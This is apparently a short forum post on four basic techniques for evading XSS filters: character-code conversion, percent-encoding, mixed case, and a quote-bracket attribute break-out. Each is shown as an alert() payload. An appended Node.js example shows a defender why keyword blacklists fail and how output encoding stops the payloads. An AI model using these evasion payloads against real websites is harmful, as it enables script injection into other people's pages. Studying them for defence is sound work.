Four super basic bypass methods.
1. Convert to ASCII codes (String.fromCharCode)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41)</script>
2. Convert to HEX (hexadecimal percent-encoding)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3. Change the case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>
4. Add a closing marker ”> in front
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: ”><script>alert(‘I love F4ck’)</script>
For more detailed bypass techniques see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
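The following is an added example, not code from the original post, showing from the defender's side why the four transformations above work against a keyword blacklist and what actually stops them: canonicalise before you inspect, and, more importantly, encode on output for the HTML context the value lands in. The four test inputs are constructed here from the post's examples (with straight quotes instead of the post's curly ones so the percent-encoding is valid), and the function names are mine. Plain Node.js, no dependencies.

```javascript
// Added example (not from the original post): a naive blacklist versus the
// post's four variants, and context-aware output encoding as the real fix.

// Constructed test inputs modelled on the post's four variants.
const VARIANTS = {
  plain: "<script>alert('I love F4ck')</script>",
  mixedCase: "<ScRipt>AleRt('I love F4ck')</sCRipT>",
  percentEncoded:
    "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e",
  attrBreakout: "\"><script>alert('I love F4ck')</script>",
};

// 1. The kind of filter the post is bypassing: an exact, case-sensitive
//    substring check on the raw (still encoded) input. Returns true if blocked.
function naiveBlacklist(input) {
  return input.includes("<script>");
}

// 2. If you must inspect input, canonicalise first: undo percent-encoding in a
//    bounded loop (handles double-encoding, and malformed sequences cannot
//    throw out of the filter), then match case-insensitively.
function fullyDecode(s) {
  let prev;
  let cur = s;
  for (let i = 0; i < 5 && prev !== cur; i++) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur);
    } catch (e) {
      break; // malformed % sequence: keep what we have
    }
  }
  return cur;
}

function normalizedCheck(input) {
  return /<\s*script\b/i.test(fullyDecode(input));
}

// 3. The actual mitigation: HTML-encode on output. Each of the five
//    characters matters; `"` and `'` are what defeat the `">` break-out in
//    variant 4, and `<`/`>` neutralise every tag regardless of case or of how
//    the script body was obfuscated (String.fromCharCode included).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render untrusted text into element content and into a quoted attribute.
function renderText(untrusted) {
  return `<p>${escapeHtml(untrusted)}</p>`;
}
function renderAttr(untrusted) {
  return `<input value="${escapeHtml(untrusted)}">`;
}

// A rendered fragment is inert if it contains no script tag in any case and
// no `"><` attribute break-out; with proper encoding neither can appear.
function isInert(html) {
  return !/<\s*script/i.test(html) && !html.includes('"><');
}

// Demonstration: which variants each approach handles. The app would normally
// see the percent-encoded variant already decoded by its framework, so the
// output-encoding column is evaluated on the decoded form.
for (const [name, payload] of Object.entries(VARIANTS)) {
  console.log(
    name.padEnd(15),
    "naive blocks:", naiveBlacklist(payload),
    "| normalized blocks:", normalizedCheck(payload),
    "| encoded output inert:", isInert(renderText(fullyDecode(payload))),
  );
}
```

Running it shows the naive filter missing both the mixed-case and the percent-encoded variant, the canonicalising check catching all four, and every variant rendering as harmless text once encoded for its context. The blacklist columns are there only to make the failure visible; output encoding is the control to rely on, because it does not need to anticipate the next transformation.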
The conversion tool used is the Firefox HackBar Mozilla add-on.